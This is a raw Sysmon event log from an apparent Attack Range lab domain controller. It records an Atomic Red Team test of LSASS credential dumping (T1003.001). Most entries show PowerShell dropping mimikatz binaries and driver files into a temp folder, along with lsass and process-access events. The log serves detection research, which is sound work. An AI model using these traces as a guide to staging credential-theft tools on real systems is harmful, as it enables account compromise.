21:10:04.420{4DB9351A-A326-60D3-3906-00000000CF01}6228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:04.420{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe2021-06-23 21:10:04.420 11241100x800000000000000025107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:10:04.373{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\x64\mimilib.dll2021-06-23 21:10:04.373 11241100x800000000000000025106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:04.342{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\x64\mimikatz.exe2021-06-23 21:10:04.342 11241100x800000000000000025105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.327{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\x64\mimidrv.sys2021-06-23 21:10:04.327 11241100x800000000000000025104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:04.295{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\Win32\mimilove.exe2021-06-23 21:10:04.295 11241100x800000000000000025103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:10:04.248{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\Win32\mimilib.dll2021-06-23 21:10:04.248 11241100x800000000000000025102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:04.217{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\Win32\mimikatz.exe2021-06-23 21:10:04.217 11241100x800000000000000025101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.202{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Mimi\Win32\mimidrv.sys2021-06-23 21:10:04.202 23542300x800000000000000025100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.155{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED989E2A20E67CD02FEA1217D3E6B4D1,SHA256=F093EB77CA759DA698A175EB43A3A6CC2218B2AF7B27A0E53E99B8E24094F370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.983{4DB9351A-A32D-60D3-4806-00000000CF01}2080ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rdn5j1gw.vce.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.983{4DB9351A-A32D-60D3-4806-00000000CF01}2080ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ycbgicim.2dy.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.920{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ycbgicim.2dy.ps12021-06-23 21:10:05.920 10341000x800000000000000025282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.873{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.795{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.748{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.757{4DB9351A-A32D-60D3-4806-00000000CF01}2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe') {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.623{4DB9351A-A32D-60D3-4706-00000000CF01}5380ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.514{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.514{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.483{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A102098ABB41DFA0DB423D5FB665D8B,SHA256=E1794F0DEF07672861C4CE17D4539A8186B775A9986DF62FEA5B7EF84B03E8F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.467{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.467{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:05.436{4DB9351A-A32D-60D3-4706-00000000CF01}5380\PSHost.132689562053460563.5380.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.436{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C09C1FC056545FAF44E4C365357788E,SHA256=EE99673CEAF67356925DBDE6641D3FDEC770D28F467CD075444112F82CB14EDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.420{4DB9351A-A32D-60D3-4706-00000000CF01}5380ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xzzcv1tl.4dh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.420{4DB9351A-A32D-60D3-4706-00000000CF01}5380ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_w4dpp5z4.eik.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.420{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_w4dpp5z4.eik.ps12021-06-23 21:10:05.420 10341000x800000000000000025261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.389{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.342{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 